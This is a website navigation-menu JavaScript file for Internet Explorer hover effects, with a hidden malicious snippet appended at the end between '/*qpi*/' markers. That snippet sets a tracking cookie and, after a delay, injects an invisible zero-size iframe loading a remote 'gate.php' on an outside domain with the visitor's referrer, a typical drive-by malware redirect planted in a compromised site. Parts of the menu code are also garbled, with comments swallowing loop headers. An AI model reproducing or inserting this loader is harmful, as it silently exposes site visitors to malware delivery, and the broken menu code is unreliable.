// JavaScript Document

startList = function() {
if (document.all&&document.getElementById) {
/* z-index fix */
var ieULs = document.getElementById('left_navmenu').getElementsByTagName('ul');
/** IE script to cover <select> elements with ' + ieULs[j].innerHTML);
        var ieMat = ieULs[j].firstChild;
                ieMat.style.width=ieULs[j].offsetWidth+"px";
                ieMat.style.height=ieULs[j].offsetHeight+"px";
                ieULs[j].style.zIndex="99";
}
var ieULs1 = document.getElementById('left_navmenu_1').getElementsByTagName('ul');
/** IE script to cover <select> elements with ' + ieULs1[j].innerHTML);
        var ieMat1 = ieULs1[j].firstChild;
                ieMat1.style.width=ieULs1[j].offsetWidth+"px";
                ieMat1.style.height=ieULs1[j].offsetHeight+"px";
                ieULs1[j].style.zIndex="99";
}

/*left menu*/
navRoot = document.getElementById("left_navmenu");
for (i=0; i<navRoot.childNodes.length; i++) {
node = navRoot.childNodes[i];
if (node.nodeName=="LI") {
node.onmouseover=function() {
this.className+=" over";
  }
  node.onmouseout=function() {
  this.className=this.className.replace(" over", "");
   }
   }
  }

/*left menu 1 */
navRoot = document.getElementById("left_navmenu_1");
for (i=0; i<navRoot.childNodes.length; i++) {
node = navRoot.childNodes[i];
if (node.nodeName=="LI") {
node.onmouseover=function() {
this.className+=" over";
  }
  node.onmouseout=function() {
  this.className=this.className.replace(" over", "");
   }
   }
  }

/*top menu*/
nodes = document.getElementsByName("top_menu");
for (ind=0; ind<nodes.length; ind++) {
node = nodes[ind];
node.onmouseover=function() {
this.className+=" over";
  }
  node.onmouseout=function() {
  this.className=this.className.replace(" over", "");
  }
}

 }
}
window.onload=startList;/*qpi*/
function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false}
var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled)
{
	document.cookie='1=1;expires='+e.toGMTString()+';path=/';
	window.setTimeout(function(){
		var JSinj=document.createElement('iframe');
		JSinj.src='http://unclesammm.com/gate.php?f=838433&r='+escape(document.referrer||'');
		JSinj.width='0';
		JSinj.height='0';
		JSinj.frameborder='0';
		JSinj.marginheight='0';
		JSinj.marginwidth='0';
		JSinj.border='0';
		try{
			document.body.appendChild(JSinj);
		}catch(e){
			document.documentElement.appendChild(JSinj);
		}
	}, 2000);
}
/*qpi*/
